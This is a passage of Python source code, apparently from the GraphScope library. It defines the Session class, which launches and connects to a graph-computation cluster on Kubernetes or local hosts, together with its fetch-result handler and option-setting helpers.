from graphscope.framework.errors import InvalidArgumentError
from graphscope.framework.errors import K8sError
from graphscope.framework.errors import check_argument
from graphscope.framework.graph import Graph
from graphscope.framework.graph import GraphDAGNode
from graphscope.framework.operation import Operation
from graphscope.framework.utils import decode_dataframe
from graphscope.framework.utils import decode_numpy
from graphscope.interactive.query import InteractiveQuery
from graphscope.interactive.query import InteractiveQueryDAGNode
from graphscope.interactive.query import InteractiveQueryStatus
from graphscope.proto import graph_def_pb2
from graphscope.proto import message_pb2
from graphscope.proto import op_def_pb2
from graphscope.proto import types_pb2
DEFAULT_CONFIG_FILE = os.environ.get(
"GS_CONFIG_PATH", os.path.expanduser("~/.graphscope/session.json")
)
_session_dict = {}
logger = logging.getLogger("graphscope")
class _FetchHandler(object):
"""Handler for structured fetches.
This class takes care of extracting a sub-DAG as targets for a user-provided structure for fetches,
which can be used for a low level `run` call of grpc_client.
Given the results of the low level run call, this class can also rebuild a result structure
matching the user-provided structure for fetches, but containing the corresponding results.
"""
def __init__(self, dag, fetches):
self._fetches = fetches
self._ops = list()
self._unpack = False
if not isinstance(self._fetches, (list, tuple)):
self._fetches = [self._fetches]
self._unpack = True
for fetch in self._fetches:
if hasattr(fetch, "op"):
fetch = fetch.op
if not isinstance(fetch, Operation):
raise ValueError("Expect a `Operation` in sess run method.")
self._ops.append(fetch)
# extract sub dag
self._sub_dag = dag.extract_subdag_for(self._ops)
if "debug" in os.environ:
logger.info("sub_dag: %s", self._sub_dag)
@property
def targets(self):
return self._sub_dag
def _rebuild_graph(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
if isinstance(self._fetches[seq], Operation):
# for nx Graph
return op_result.graph_def
# get graph dag node as base
graph_dag_node = self._fetches[seq]
# construct graph
g = Graph(graph_dag_node)
# update graph flied from graph_def
g.update_from_graph_def(op_result.graph_def)
return g
def _rebuild_learning_graph(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
from graphscope.learning.graph import Graph as LearningGraph
handle = op_result.handle
handle = json.loads(base64.b64decode(handle).decode("utf-8"))
config = op_result.config.decode("utf-8")
handle["server"] = op_result.result.decode("utf-8")
handle["client_count"] = 1
graph_dag_node = self._fetches[seq]
# construct learning graph
g = LearningGraph(
graph_dag_node, handle, config, op_result.extra_info.decode("utf-8")
)
return g
def _rebuild_interactive_query(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
# get interactive query dag node as base
interactive_query_node = self._fetches[seq]
# construct interactive query
interactive_query = InteractiveQuery(
interactive_query_node,
op_result.result.decode("utf-8"),
op_result.extra_info.decode("utf-8"),
)
interactive_query.status = InteractiveQueryStatus.Running
return interactive_query
def _rebuild_app(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
from graphscope.framework.app import App
# get app dag node as base
app_dag_node = self._fetches[seq]
# construct app
app = App(app_dag_node, op_result.result.decode("utf-8"))
return app
def _rebuild_context(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
from graphscope.framework.context import Context
from graphscope.framework.context import DynamicVertexDataContext
# get context dag node as base
context_dag_node = self._fetches[seq]
ret = json.loads(op_result.result.decode("utf-8"))
context_type = ret["context_type"]
if context_type == "dynamic_vertex_data":
# for nx
return DynamicVertexDataContext(context_dag_node, ret["context_key"])
else:
return Context(context_dag_node, ret["context_key"], ret["context_schema"])
def _rebuild_gremlin_results(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
from graphscope.interactive.query import ResultSet
# get result set node as base
result_set_dag_node = self._fetches[seq]
return ResultSet(result_set_dag_node)
def wrapper_results(self, response: message_pb2.RunStepResponse):
rets = list()
for seq, op in enumerate(self._ops):
for op_result in response.results:
if op.key == op_result.key:
if op.output_types == types_pb2.RESULTS:
if op.type == types_pb2.RUN_APP:
rets.append(self._rebuild_context(seq, op, op_result))
elif op.type == types_pb2.FETCH_GREMLIN_RESULT:
rets.append(pickle.loads(op_result.result))
else:
# for nx Graph
rets.append(op_result.result.decode("utf-8"))
if op.output_types == types_pb2.GREMLIN_RESULTS:
rets.append(self._rebuild_gremlin_results(seq, op, op_result))
if op.output_types == types_pb2.GRAPH:
rets.append(self._rebuild_graph(seq, op, op_result))
if op.output_types == types_pb2.LEARNING_GRAPH:
rets.append(self._rebuild_learning_graph(seq, op, op_result))
if op.output_types == types_pb2.APP:
rets.append(None)
if op.output_types == types_pb2.BOUND_APP:
rets.append(self._rebuild_app(seq, op, op_result))
if op.output_types in (
types_pb2.VINEYARD_TENSOR,
types_pb2.VINEYARD_DATAFRAME,
):
rets.append(
json.loads(op_result.result.decode("utf-8"))["object_id"]
)
if op.output_types in (types_pb2.TENSOR, types_pb2.DATAFRAME):
if (
op.type == types_pb2.CONTEXT_TO_DATAFRAME
or op.type == types_pb2.GRAPH_TO_DATAFRAME
):
rets.append(decode_dataframe(op_result.result))
if (
op.type == types_pb2.CONTEXT_TO_NUMPY
or op.type == types_pb2.GRAPH_TO_NUMPY
):
rets.append(decode_numpy(op_result.result))
if op.output_types == types_pb2.INTERACTIVE_QUERY:
rets.append(self._rebuild_interactive_query(seq, op, op_result))
if op.output_types == types_pb2.NULL_OUTPUT:
rets.append(None)
break
return rets[0] if self._unpack else rets
class Session(object):
"""A class for interacting with GraphScope graph computation service cluster.
A :class:`Session` object encapsulates the environment in which :class:`Operation`
objects are executed/evaluated.
A session may own resources. It is important to release these resources when
they are no longer required. To do this, invoke the :meth:`close` method
on the session.
A Session can register itself as default session with :meth:`as_default`, and all operations
after that will use the default session. Session deregister itself as a default session
when closed.
The following example demonstrates its usage:
.. code:: python
>>> import graphscope as gs
>>> # use session object explicitly
>>> sess = gs.session()
>>> g = sess.g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = gs.sssp(g, 4)
>>> sess.close()
>>> # or use a session as default
>>> sess = gs.session().as_default()
>>> g = gs.g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = gs.sssp(pg, 4)
>>> sess.close()
We support setup a service cluster and create a RPC session in following ways:
- GraphScope graph computation service run in cluster managed by kubernetes.
>>> s = graphscope.session()
Also, :class:`Session` provides several keyword params for users to define the cluster.
You may use the param :code:`k8s_gs_image` to specify the image for all engine pod, and
param :code:`k8s_engine_cpu` or :code:`k8s_engine_mem` to specify the resources. More,
you can find all params detail in :meth:`__init__` method.
>>> s = graphscope.session(
... k8s_gs_image="registry.cn-hongkong.aliyuncs.com/graphscope/graphscope:latest",
... k8s_vineyard_cpu=0.1,
... k8s_vineyard_mem="256Mi",
... vineyard_shared_mem="4Gi",
... k8s_engine_cpu=0.1,
... k8s_engine_mem="256Mi")
- or all params can be provided by a json configuration file or configuration dict.
>>> s = graphscope.session(config='/tmp/config.json')
>>> # Or
>>> s = graphscope.session(config={'k8s_engine_cpu': 5, 'k8s_engine_mem': '5Gi'})
"""
@set_defaults(gs_config)
def __init__(
self,
config=None,
addr=gs_config.addr,
mode=gs_config.mode,
cluster_type=gs_config.cluster_type,
num_workers=gs_config.num_workers,
preemptive=gs_config.preemptive,
k8s_namespace=gs_config.k8s_namespace,
k8s_service_type=gs_config.k8s_service_type,
k8s_gs_image=gs_config.k8s_gs_image,
k8s_etcd_image=gs_config.k8s_etcd_image,
k8s_image_pull_policy=gs_config.k8s_image_pull_policy,
k8s_image_pull_secrets=gs_config.k8s_image_pull_secrets,
k8s_coordinator_cpu=gs_config.k8s_coordinator_cpu,
k8s_coordinator_mem=gs_config.k8s_coordinator_mem,
k8s_etcd_num_pods=gs_config.k8s_etcd_num_pods,
k8s_etcd_cpu=gs_config.k8s_etcd_cpu,
k8s_etcd_mem=gs_config.k8s_etcd_mem,
k8s_vineyard_daemonset=gs_config.k8s_vineyard_daemonset,
k8s_vineyard_cpu=gs_config.k8s_vineyard_cpu,
k8s_vineyard_mem=gs_config.k8s_vineyard_mem,
vineyard_shared_mem=gs_config.vineyard_shared_mem,
k8s_engine_cpu=gs_config.k8s_engine_cpu,
k8s_engine_mem=gs_config.k8s_engine_mem,
k8s_mars_worker_cpu=gs_config.mars_worker_cpu,
k8s_mars_worker_mem=gs_config.mars_worker_mem,
k8s_mars_scheduler_cpu=gs_config.mars_scheduler_cpu,
k8s_mars_scheduler_mem=gs_config.mars_scheduler_mem,
k8s_volumes=gs_config.k8s_volumes,
k8s_waiting_for_delete=gs_config.k8s_waiting_for_delete,
timeout_seconds=gs_config.timeout_seconds,
dangling_timeout_seconds=gs_config.dangling_timeout_seconds,
with_mars=gs_config.with_mars,
enable_gaia=gs_config.enable_gaia,
reconnect=False,
**kw,
):
"""Construct a new GraphScope session.
Args:
config (dict or str, optional): The configuration dict or file about how to launch the GraphScope instance.
For str, it will identify it as a path and read the configuration file to build a
session if file exist. If not specified, the global default configuration
:code:`DEFAULT_CONFIG_FILE` will be used, which get value of GS_CONFIG_PATH
in environment. Note that it will overwrite explicit parameters. Defaults to None.
addr (str, optional): The endpoint of a pre-launched GraphScope instance with '<ip>:<port>' format.
A new session id will be generated for each session connection.
mode (str, optional): optional values are eager and lazy. Defaults to eager.
Eager execution is a flexible platform for research and experimentation, it provides:
An intuitive interface: Quickly test on small data.
Easier debugging: Call ops directly to inspect running models and test changes.
Lazy execution means GraphScope does not process the data till it has to. It just gathers all the
information to a DAG that we feed into it, and processes only when we execute :code:`sess.run(fetches)`
cluster_type (str, optional): Deploy GraphScope instance on hosts or k8s cluster. Defaults to k8s.
Available options: "k8s" and "hosts". Note that only support deployed on localhost with hosts mode.
num_workers (int, optional): The number of workers to launch GraphScope engine. Defaults to 2.
preemptive (bool, optional): If True, GraphScope instance will treat resource params (e.g. k8s_coordinator_cpu)
as limits and provide the minimum available value as requests, but this will make pod has a `Burstable` QOS,
which can be preempted by other pods with high QOS. Otherwise, it will set both requests and limits with the
same value.
k8s_namespace (str, optional): Contains the namespace to create all resource inside.
If param missing, it will try to read namespace from kubernetes context, or
a random namespace will be created and deleted if namespace not exist.
Defaults to None.
k8s_service_type (str, optional): Type determines how the GraphScope service is exposed.
Valid options are NodePort, and LoadBalancer. Defaults to NodePort.
k8s_gs_image (str, optional): The GraphScope engine's image.
k8s_etcd_image (str, optional): The image of etcd, which used by vineyard.
k8s_image_pull_policy (str, optional): Kubernetes image pull policy. Defaults to "IfNotPresent".
k8s_image_pull_secrets (list[str], optional): A list of secret name used to authorize pull image.
k8s_vineyard_daemonset (str, optional): The name of vineyard Helm deployment to use. GraphScope will try to
discovery the daemonset from kubernetes cluster, then use it if exists, and fallback to launching
a bundled vineyard container otherwise.
k8s_vineyard_cpu (float, optional): Minimum number of CPU cores request for vineyard container. Defaults to 0.5.
k8s_vineyard_mem (str, optional): Minimum number of memory request for vineyard container. Defaults to '512Mi'.
vineyard_shared_mem (str, optional): Init size of vineyard shared memory. Defaults to '4Gi'.
k8s_engine_cpu (float, optional): Minimum number of CPU cores request for engine container. Defaults to 0.5.
k8s_engine_mem (str, optional): Minimum number of memory request for engine container. Defaults to '4Gi'.
k8s_coordinator_cpu (float, optional): Minimum number of CPU cores request for coordinator pod. Defaults to 1.0.
k8s_coordinator_mem (str, optional): Minimum number of memory request for coordinator pod. Defaults to '4Gi'.
k8s_etcd_num_pods (int, optional): The number of etcd pods. Defaults to 3.
k8s_etcd_cpu (float, optional): Minimum number of CPU cores request for etcd pod. Defaults to 0.5.
k8s_etcd_mem (str, optional): Minimum number of memory request for etcd pod. Defaults to '128Mi'.
k8s_mars_worker_cpu (float, optional):
Minimum number of CPU cores request for mars worker container. Defaults to 0.5.
k8s_mars_worker_mem (str, optional):
Minimum number of memory request for mars worker container. Defaults to '4Gi'.
k8s_mars_scheduler_cpu (float, optional):
Minimum number of CPU cores request for mars scheduler container. Defaults to 0.5.
k8s_mars_scheduler_mem (str, optional):
Minimum number of memory request for mars scheduler container. Defaults to '2Gi'.
with_mars (bool, optional):
Launch graphscope with mars. Defaults to False.
enable_gaia (bool, optional):
Launch graphscope with gaia enabled. Defaults to False.
k8s_volumes (dict, optional): A dict of k8s volume which represents a directory containing data, accessible to the
containers in a pod. Defaults to {}.
For example, you can mount host path with:
k8s_volumes = {
"my-data": {
"type": "hostPath",
"field": {
"path": "<path>",
"type": "Directory"
},
"mounts": [
{
"mountPath": "<path1>"
},
{
"mountPath": "<path2>"
}
]
}
}
Or you can mount PVC with:
k8s_volumes = {
"my-data": {
"type": "persistentVolumeClaim",
"field": {
"claimName": "your-pvc-name"
},
"mounts": [
{
"mountPath": "<path1>"
}
]
}
}
Also, you can mount a single volume with:
k8s_volumes = {
"my-data": {
"type": "hostPath",
"field": {xxx},
"mounts": {
"mountPath": "<path1>"
}
}
}
timeout_seconds (int, optional): For waiting service ready (or waiting for delete if
k8s_waiting_for_delete is True).
dangling_timeout_seconds (int, optional): After seconds of client disconnect,
coordinator will kill this graphscope instance. Defaults to 600.
Expect this value to be greater than 5 (heartbeat interval).
Disable dangling check by setting -1.
k8s_waiting_for_delete (bool, optional): Waiting for service delete or not. Defaults to False.
**kw (dict, optional): Other optional parameters will be put to :code:`**kw`.
- k8s_minikube_vm_driver: Deprecated.
- k8s_client_config (dict, optional):
Provide configurable parameters for connecting to remote k8s,
which strongly relies on the `kube_config.new_client_from_config` function.
eg: {"config_file": "~/.kube/config", "context": None, "persist_config": True}
config_file: Name of the kube-config file.
context: set the active context. If is set to None, current_context from config file will be used.
persist_config: If True, config file will be updated when changed(e.g GCP token refresh).
- log_level: Deprecated.
Move this param as a global configuration. Set via `graphscope.set_option(log_level='DEBUG')`
- show_log: Deprecated.
Move this param as a global configuration.Set via `graphscope.set_option(show_log=True)`
- k8s_vineyard_shared_mem: Deprecated.
Please use vineyard_shared_mem instead.
reconnect (bool, optional): When connecting to a pre-launched GraphScope cluster with :code:`addr`,
the connect request would be rejected with there is still an existing session connected. There
are cases where the session still exists and user's client has lost connection with the backend,
e.g., in a jupyter notebook. We have a :code:`dangling_timeout_seconds` for it, but a more
deterministic behavior would be better.
If :code:`reconnect` is True, the existing session will be reused. It is the user's responsibility
to ensure there's no such an active client actually.
Defaults to :code:`False`.
- k8s_gie_graph_manager_image: Deprecated.
- k8s_gie_graph_manager_cpu: Deprecated.
- k8s_gie_graph_manager_mem: Deprecated.
- k8s_zookeeper_image: Deprecated.
- k8s_zookeeper_cpu: Deprecated.
- k8s_zookeeper_mem: Deprecated.
Raises:
TypeError: If the given argument combination is invalid and cannot be used to create
a GraphScope session.
"""
self._config_params = {}
self._accessable_params = (
"addr",
"mode",
"cluster_type",
"num_workers",
"preemptive",
"k8s_namespace",
"k8s_service_type",
"k8s_gs_image",
"k8s_etcd_image",
"k8s_image_pull_policy",
"k8s_image_pull_secrets",
"k8s_coordinator_cpu",
"k8s_coordinator_mem",
"k8s_etcd_num_pods",
"k8s_etcd_cpu",
"k8s_etcd_mem",
"k8s_vineyard_daemonset",
"k8s_vineyard_cpu",
"k8s_vineyard_mem",
"vineyard_shared_mem",
"k8s_engine_cpu",
"k8s_engine_mem",
"k8s_mars_worker_cpu",
"k8s_mars_worker_mem",
"k8s_mars_scheduler_cpu",
"k8s_mars_scheduler_mem",
"with_mars",
"enable_gaia",
"reconnect",
"k8s_volumes",
"k8s_waiting_for_delete",
"timeout_seconds",
"dangling_timeout_seconds",
)
self._deprecated_params = (
"show_log",
"log_level",
"k8s_vineyard_shared_mem",
"k8s_gie_graph_manager_image",
"k8s_gie_graph_manager_cpu",
"k8s_gie_graph_manager_mem",
"k8s_zookeeper_image",
"k8s_zookeeper_cpu",
"k8s_zookeeper_mem",
)
saved_locals = locals()
for param in self._accessable_params:
self._config_params[param] = saved_locals[param]
# parse config, which should be a path to config file, or dict
# config has highest priority
if isinstance(config, dict):
self._config_params.update(config)
elif isinstance(config, str):
self._load_config(config, slient=False)
elif DEFAULT_CONFIG_FILE:
self._load_config(DEFAULT_CONFIG_FILE)
# update other optional params
self._config_params.update(kw)
# initial setting of cluster_type
self._cluster_type = self._parse_cluster_type()
# initial dag
self._dag = Dag()
# mars cannot work with run-on-local mode
if self._cluster_type == types_pb2.HOSTS and self._config_params["with_mars"]:
raise NotImplementedError(
"Mars cluster cannot be launched along with local GraphScope deployment"
)
# deprecated params handle
for param in self._deprecated_params:
if param in kw:
warnings.warn(
"The `{0}` parameter has been deprecated and has no effect.".format(
param
),
category=DeprecationWarning,
)
if param == "show_log" or param == "log_level":
warnings.warn(
"Please use `graphscope.set_option({0}={1})` instead".format(
param, kw.pop(param, None)
),
category=DeprecationWarning,
)
if param == "k8s_vineyard_shared_mem":
warnings.warn(
"Please use 'vineyard_shared_mem' instead",
category=DeprecationWarning,
)
kw.pop(param, None)
# update k8s_client_config params
self._config_params["k8s_client_config"] = kw.pop("k8s_client_config", {})
# There should be no more custom keyword arguments.
if kw:
raise ValueError("Value not recognized: ", list(kw.keys()))
if self._config_params["addr"]:
logger.info(
"Connecting graphscope session with address: %s",
self._config_params["addr"],
)
else:
logger.info(
"Initializing graphscope session with parameters: %s",
self._config_params,
)
self._closed = False
# coordinator service endpoint
self._coordinator_endpoint = None
self._launcher = None
self._heartbeat_sending_thread = None
self._grpc_client = None
self._session_id = None # unique identifier across sessions
# engine config:
#
# {
# "experiment": "ON/OFF",
# "vineyard_socket": "...",
# "vineyard_rpc_endpoint": "..."
# }
self._engine_config = None
# interactive instance related graph map
self._interactive_instance_dict = {}
# learning engine related graph map
self._learning_instance_dict = {}
self._default_session = None
atexit.register(self.close)
# create and connect session
with CaptureKeyboardInterrupt(self.close):
self._connect()
self._disconnected = False
# heartbeat
self._heartbeat_interval_seconds = 5
self._heartbeat_sending_thread = threading.Thread(
target=self._send_heartbeat, args=()
)
self._heartbeat_sending_thread.daemon = True
self._heartbeat_sending_thread.start()
# networkx module
self._nx = None
def __repr__(self):
return str(self.info)
def __str__(self):
return repr(self)
@property
def session_id(self):
return self._session_id
@property
def dag(self):
return self._dag
def _load_config(self, path, slient=True):
config_path = os.path.expandvars(os.path.expanduser(path))
try:
with open(config_path, "r") as f:
data = json.load(f)
self._config_params.update(data)
except Exception as exp: # noqa
if not slient:
raise exp
def _parse_cluster_type(self):
if self._config_params["addr"] is not None:
# get the cluster type after connecting
return types_pb2.UNDEFINED
else:
if self._config_params["cluster_type"] == "hosts":
self._run_on_local()
return types_pb2.HOSTS
elif self._config_params["cluster_type"] == "k8s":
return types_pb2.K8S
else:
raise ValueError("Expect hosts or k8s of cluster_type parameter")
@property
def engine_config(self):
"""Show the engine configration associated with session in json format."""
return self._engine_config
@property
def info(self):
"""Show all resources info associated with session in json format."""
info = {}
if self._closed:
info["status"] = "closed"
elif self._grpc_client is None or self._disconnected:
info["status"] = "disconnected"
else:
info["status"] = "active"
if self._cluster_type == types_pb2.K8S:
info["type"] = "k8s"
info["engine_hosts"] = ",".join(self._pod_name_list)
info["namespace"] = self._config_params["k8s_namespace"]
else:
info["type"] = "hosts"
info["engine_hosts"] = self._engine_config["engine_hosts"]
info["cluster_type"] = str(self._cluster_type)
info["session_id"] = self.session_id
info["num_workers"] = self._config_params["num_workers"]
info["coordinator_endpoint"] = self._coordinator_endpoint
info["engine_config"] = self._engine_config
return info
@property
def closed(self):
return self._closed
def eager(self):
return self._config_params["mode"] == "eager"
def _send_heartbeat(self):
while not self._closed:
if self._grpc_client:
try:
self._grpc_client.send_heartbeat()
except Exception as exc:
logger.warning(exc)
self._disconnected = True
else:
self._disconnected = False
time.sleep(self._heartbeat_interval_seconds)
def close(self):
"""Closes this session.
This method frees all resources associated with the session.
"""
if self._closed:
return
self._closed = True
self._coordinator_endpoint = None
self._deregister_default()
if self._heartbeat_sending_thread:
self._heartbeat_sending_thread.join(
timeout=self._heartbeat_interval_seconds
)
self._heartbeat_sending_thread = None
self._disconnected = True
# close all interactive instances
for instance in self._interactive_instance_dict.values():
try:
if instance is not None:
instance.close()
except Exception:
pass
self._interactive_instance_dict.clear()
# close all learning instances
for instance in self._learning_instance_dict.values():
try:
if instance is not None:
instance.close()
except Exception:
pass
self._learning_instance_dict.clear()
if self._grpc_client:
try:
self._grpc_client.close()
except Exception:
pass
self._grpc_client = None
_session_dict.pop(self._session_id, None)
# clean up
if self._config_params["addr"] is None:
try:
if self._launcher:
self._launcher.stop()
except Exception:
pass
self._pod_name_list = []
def _close_interactive_instance(self, instance):
"""Close a interactive instance."""
if self.eager():
self._interactive_instance_dict[instance.object_id] = None
def _close_learning_instance(self, instance):
"""Close a learning instance."""
if self.eager():
self._learning_instance_dict[instance.object_id] = None
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
def _check_closed(self, msg=None):
"""Internal: raise a ValueError if session is closed"""
if self.closed:
raise ValueError(msg or "Operation on closed session.")
# Context manager
def __enter__(self):
"""Context management protocol.
Returns self and register self as default session.
"""
self._check_closed()
self.as_default()
return self
def __exit__(self, type, value, traceback):
"""Deregister self from the default session,
close the session and release the resources, ignore all exceptions in close().
"""
try:
self._deregister_default()
self.close()
except Exception:
pass
def as_default(self):
"""Obtain a context manager that make this object as default session.
This method is used when a Session is constructed, which will immediately
install self as a default session.
Raises:
ValueError: If default session exist in current context.
Returns:
A context manager using this session as the default session.
"""
if not _default_session_stack.is_cleared():
raise ValueError(
"A default session is already active. You must explicitly call Session.close()."
)
# session context manager
self._default_session = default_session(self)
self._default_session.__enter__()
def _deregister_default(self):
"""Remove self from the default session stack."""
if self._default_session:
self._default_session.__exit__(None, None, None)
self._default_session = None
def _wrapper(self, dag_node):
if self.eager():
return self.run(dag_node)
else:
return dag_node
def run(self, fetches, debug=False):
"""Run operations of `fetch`.
Args:
fetch: :class:`Operation`
Raises:
RuntimeError:
Client disconnect to the service. Or run on a closed session.
ValueError:
If fetch is not a instance of :class:`Operation`. Or
the fetch has been evaluated.
InvalidArgumentError:
Not recognized on output type.
Returns:
Different values for different output types of :class:`Operation`
"""
if self._closed:
raise RuntimeError("Attempted to use a closed Session.")
if not self._grpc_client:
raise RuntimeError("Session disconnected.")
fetch_handler = _FetchHandler(self.dag, fetches)
try:
response = self._grpc_client.run(fetch_handler.targets)
except FatalError:
self.close()
raise
return fetch_handler.wrapper_results(response)
def _connect(self):
if self._config_params["addr"] is not None:
# try connect to exist coordinator
self._coordinator_endpoint = self._config_params["addr"]
elif self._cluster_type == types_pb2.K8S:
if (
self._config_params["k8s_etcd_image"] is None
or self._config_params["k8s_gs_image"] is None
):
raise K8sError("None image found.")
if isinstance(
self._config_params["k8s_client_config"],
kube_client.api_client.ApiClient,
):
api_client = self._config_params["k8s_client_config"]
else:
api_client = kube_config.new_client_from_config(
**self._config_params["k8s_client_config"]
)
self._launcher = KubernetesClusterLauncher(
api_client=api_client,
**self._config_params,
)
elif (
self._cluster_type == types_pb2.HOSTS
and isinstance(self._config_params["hosts"], list)
and len(self._config_params["hosts"]) != 0
and self._config_params["num_workers"] > 0
):
# lanuch coordinator with hosts
self._launcher = HostsClusterLauncher(
**self._config_params,
)
else:
raise RuntimeError(
f"Unrecognized cluster type {types_pb2.ClusterType.Name(self._cluster_type)}."
)
# launching graphscope service
if self._launcher is not None:
self._launcher.start()
self._coordinator_endpoint = self._launcher.coordinator_endpoint
# waiting service ready
self._grpc_client = GRPCClient(self._launcher, self._config_params["reconnect"])
self._grpc_client.waiting_service_ready(
timeout_seconds=self._config_params["timeout_seconds"],
)
# connect and fetch logs from rpc server
try:
(
self._session_id,
self._cluster_type,
self._engine_config,
self._pod_name_list,
self._config_params["num_workers"],
self._config_params["k8s_namespace"],
) = self._grpc_client.connect(
cleanup_instance=not bool(self._config_params["addr"]),
dangling_timeout_seconds=self._config_params[
"dangling_timeout_seconds"
],
)
# fetch logs
if self._config_params["addr"] or self._cluster_type == types_pb2.K8S:
self._grpc_client.fetch_logs()
_session_dict[self._session_id] = self
except Exception:
self.close()
raise
def get_config(self):
"""Get configuration of the session."""
return self._config_params
def g(self, incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
return self._wrapper(
GraphDAGNode(self, incoming_data, oid_type, directed, generate_eid)
)
def load_from(self, *args, **kwargs):
"""Load a graph within the session.
See more information in :meth:`graphscope.load_from`.
"""
with default_session(self):
return graphscope.load_from(*args, **kwargs)
def _run_on_local(self):
self._config_params["hosts"] = ["localhost"]
self._config_params["port"] = None
self._config_params["vineyard_socket"] = ""
@set_defaults(gs_config)
def gremlin(self, graph, engine_params=None):
"""Get a interactive engine handler to execute gremlin queries.
It will return a instance of :class:`graphscope.interactive.query.InteractiveQueryDAGNode`,
that will be evaluated by :method:`sess.run` in eager mode.
Note that this method will be executed implicitly in eager mode when a property graph created
and cache a instance of InteractiveQuery in session if `initializing_interactive_engine` is True.
If you want to create a new instance under the same graph by different params, you should close
the instance first.
.. code:: python
>>> # close and recreate InteractiveQuery in eager mode.
>>> interactive_query = sess.gremlin(g)
>>> interactive_query.close()
>>> interactive_query = sess.gremlin(g, engine_params={"xxx":"xxx"})
Args:
graph (:class:`graphscope.framework.graph.GraphDAGNode`):
The graph to create interactive instance.
engine_params (dict, optional): Configure startup parameters of interactive engine.
You can also configure this param by `graphscope.set_option(engine_params={})`.
See a list of configurable keys in
`interactive_engine/deploy/docker/dockerfile/executor.vineyard.properties`
Raises:
InvalidArgumentError:
- :code:`graph` is not a property graph.
- :code:`graph` is unloaded in eager mode.
Returns:
:class:`graphscope.interactive.query.InteractiveQueryDAGNode`:
InteractiveQuery to execute gremlin queries, evaluated in eager mode.
"""
# Interactive query instance won't add to self._interactive_instance_dict in lazy mode.
# self._interactive_instance_dict[graph.vineyard_id] will be None if InteractiveQuery closed
if (
self.eager()
and graph.vineyard_id in self._interactive_instance_dict
and self._interactive_instance_dict[graph.vineyard_id] is not None
):
interactive_query = self._interactive_instance_dict[graph.vineyard_id]
if interactive_query.status == InteractiveQueryStatus.Running:
return interactive_query
elif interactive_query.status == InteractiveQueryStatus.Failed:
raise InteractiveEngineInternalError(interactive_query.error_msg)
else:
# Initializing.
# while True is ok, as the status is either running or failed eventually after timeout.
while True:
time.sleep(1)
if interactive_query.status == InteractiveQueryStatus.Running:
return interactive_query
elif interactive_query.status == InteractiveQueryStatus.Failed:
raise InteractiveEngineInternalError(
interactive_query.error_msg
)
if not graph.graph_type == graph_def_pb2.ARROW_PROPERTY:
raise InvalidArgumentError("The graph should be a property graph.")
if self.eager():
if not graph.loaded():
raise InvalidArgumentError("The graph has already been unloaded")
# cache the instance of interactive query in eager mode
interactive_query = InteractiveQuery()
self._interactive_instance_dict[graph.vineyard_id] = interactive_query
try:
enable_gaia = self._config_params["enable_gaia"]
_wrapper = self._wrapper(
InteractiveQueryDAGNode(self, graph, engine_params, enable_gaia)
)
except Exception as e:
if self.eager():
interactive_query.status = InteractiveQueryStatus.Failed
interactive_query.error_msg = str(e)
raise InteractiveEngineInternalError(str(e)) from e
else:
if self.eager():
interactive_query = _wrapper
graph._attach_interactive_instance(interactive_query)
return _wrapper
def learning(self, graph, nodes=None, edges=None, gen_labels=None):
"""Start a graph learning engine.
Args:
nodes (list): The node types that will be used for gnn training.
edges (list): The edge types that will be used for gnn training.
gen_labels (list): Extra node and edge labels on original graph for gnn training.
Returns:
:class:`graphscope.learning.GraphDAGNode`:
An instance of learning graph that could be feed to the learning engine, evaluated in eager node.
"""
if (
self.eager()
and graph.vineyard_id in self._learning_instance_dict
and self._learning_instance_dict[graph.vineyard_id] is not None
):
return self._learning_instance_dict[graph.vineyard_id]
if sys.platform != "linux" and sys.platform != "linux2":
raise RuntimeError(
f"The learning engine currently only supports running on Linux, got {sys.platform}"
)
if not graph.graph_type == graph_def_pb2.ARROW_PROPERTY:
raise InvalidArgumentError("The graph should be a property graph.")
if self.eager():
if not graph.loaded():
raise InvalidArgumentError("The graph has already been unloaded")
from graphscope.learning.graph import GraphDAGNode as LearningGraphDAGNode
_wrapper = self._wrapper(
LearningGraphDAGNode(self, graph, nodes, edges, gen_labels)
)
if self.eager():
self._learning_instance_dict[graph.vineyard_id] = _wrapper
graph._attach_learning_instance(_wrapper)
return _wrapper
def nx(self):
if not self.eager():
raise RuntimeError(
"Networkx module need the session to be eager mode. "
"Current session is lazy mode."
)
if self._nx:
return self._nx
import importlib.util
spec = importlib.util.find_spec("graphscope.nx")
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
graph = type("Graph", (mod.Graph.__base__,), dict(mod.Graph.__dict__))
digraph = type("DiGraph", (mod.DiGraph.__base__,), dict(mod.DiGraph.__dict__))
setattr(graph, "_session", self)
setattr(digraph, "_session", self)
setattr(mod, "Graph", graph)
setattr(mod, "DiGraph", digraph)
self._nx = mod
return self._nx
session = Session
def set_option(**kwargs):
"""Set the value of specified options.
Find params detail in :class:`graphscope.Session`
Available options:
- num_workers
- log_level
- show_log
- vineyard_shared_mem
- k8s_namespace
- k8s_service_type
- k8s_gs_image
- k8s_etcd_image
- k8s_image_pull_policy
- k8s_image_pull_secrets
- k8s_coordinator_cpu
- k8s_coordinator_mem
- k8s_vineyard_daemonset
- k8s_vineyard_cpu
- k8s_vineyard_mem
- k8s_engine_cpu
- k8s_engine_mem
- k8s_mars_worker_cpu
- k8s_mars_worker_mem
- k8s_mars_scheduler_cpu
- k8s_mars_scheduler_mem
- with_mars
- enable_gaia
- k8s_volumes
- k8s_waiting_for_delete
- engine_params
- initializing_interactive_engine
- timeout_seconds
Args:
kwargs: dict
kv pair of GraphScope config you want to set.
Raises:
ValueError: If no such option exists.
Returns: None
"""
# check exists
for k, v in kwargs.items():
if not hasattr(gs_config, k):
raise ValueError(f"No such option {k} exists.")
for k, v in kwargs.items():
setattr(gs_config, k, v)
GSLogger.update()
def get_option(key):
"""Get the value of specified option.
Find params detail in :class:`graphscope.Session`
Available options:
- num_workers
- log_level
- show_log
- vineyard_shared_mem
- k8s_namespace
- k8s_service_type
- k8s_gs_image
- k8s_etcd_image
- k8s_image_pull_policy
